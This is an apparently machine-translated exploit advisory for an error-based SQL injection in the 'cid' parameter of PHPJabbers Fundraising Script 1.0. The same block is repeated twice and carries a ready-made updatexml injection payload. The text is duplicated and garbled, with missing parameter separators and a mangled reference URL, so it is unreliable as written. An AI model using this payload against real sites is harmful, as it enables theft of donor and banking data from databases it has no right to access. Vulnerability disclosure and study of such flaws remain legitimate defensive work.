## title:筹款脚本1.0 sqli
##作者: nu11secur1ty
## date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectiondemo
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ CID”参数似乎很容易受到SQL注入攻击的影响。
有效载荷'在CID参数中提交,数据库错误
消息退还了。
数据库是空的,但是如果不是,这将结束
捐助者及其银行帐户的钱!
攻击者可以从数据库中窃取所有信息!
[+]有效载荷:
mysql
参数: CID(GET)
type:基于错误的
title: mysql=5.1基于错误的- 参数替换(updatexml)
PAYLOAD:控制器=pjfrontaction=pjactionloadCampaigncid=(updatexml(1741,concat(0x2e,0x71626b7071),(select
(ELT(1741=1741,1))),0x7162787171),3873))
系统管理员- 基础设施工程师
穿透测试工程师
nu11secur1ty http://nu11secur1ty.com/
##作者: nu11secur1ty
## date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectiondemo
##参考: https://portswigger.net/web-security/sql-invoction
## Description:
“ CID”参数似乎很容易受到SQL注入攻击的影响。
有效载荷'在CID参数中提交,数据库错误
消息退还了。
数据库是空的,但是如果不是,这将结束
捐助者及其银行帐户的钱!
攻击者可以从数据库中窃取所有信息!
[+]有效载荷:
mysql
参数: CID(GET)
type:基于错误的
title: mysql=5.1基于错误的- 参数替换(updatexml)
PAYLOAD:控制器=pjfrontaction=pjactionloadCampaigncid=(updatexml(1741,concat(0x2e,0x71626b7071),(select
(ELT(1741=1741,1))),0x7162787171),3873))
正在加载...
github.com
穿透测试工程师
nu11secur1ty http://nu11secur1ty.com/